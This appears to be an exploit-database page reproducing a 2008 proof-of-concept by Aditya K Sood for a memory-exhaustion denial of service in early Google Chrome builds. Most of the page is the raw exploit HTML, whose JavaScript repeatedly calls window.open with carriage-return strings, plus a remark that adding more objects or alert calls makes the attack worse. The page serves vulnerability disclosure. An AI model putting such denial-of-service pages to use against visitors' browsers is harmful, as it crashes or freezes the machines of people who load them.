header-logo
Suggest Exploit
vendor:
Chrome
by:
Aditya K Sood
7.5
CVSS
HIGH
Memory Exhaustion Remote Denial of Service
400
CWE
Product Name: Chrome
Affected Version From: Official Build 1798
Affected Version To: Official Build 2200
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2008

Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.

This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example: using alert function will make it more exhaustive.

Mitigation:

Keep an eye on the memory consumption in Task Manager.
Source

Exploit-DB raw data:

<html>
<title>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Dos.</title>
<head>
<script language="javascript">

window.open("\r\n\r\n");
window.refresh();
window.open("\r\n\r\n");


</script>
</head>

<body><br><br>
<h2><center>Google Chrome Carriage Return Null Object Memory Exhaustion Remote Denial of Service.<br><br>Proof of Concept</br></br> </center></h2>


<center>
<b>Note:: Keep an eye on the memory consumption in Task Manager.</b><br><br>

<hr></hr>
<b>This POC has been designed with minimum object usage. This can be made more critical when combined with number of objects. For Example:
using alert function will make it more exhaustive.</b></br></br>

<b><br>Aditya K Sood<br> (c) SecNiche Security.<br><a href="http://www.secniche.org">http://www.secniche.org</a></br></b>
<hr></hr></center>
<b>Version Tested:<br><br>Official Build 1798<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US)<br> AppleWebKit/525.13 (KHTML, like Gecko)<br> Chrome/0.2.149.29 Safari/525.13
 <br><br>

Official Build 2200<br>
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) <br>AppleWebKit/525.13 (KHTML, like Gecko) <br>Chrome/0.2.149.30 Safari/525.13
</b>
<hr></hr>
</body>


</html>

# milw0rm.com [2008-09-24]

Navigation

Suggest Exploit

Services By CQR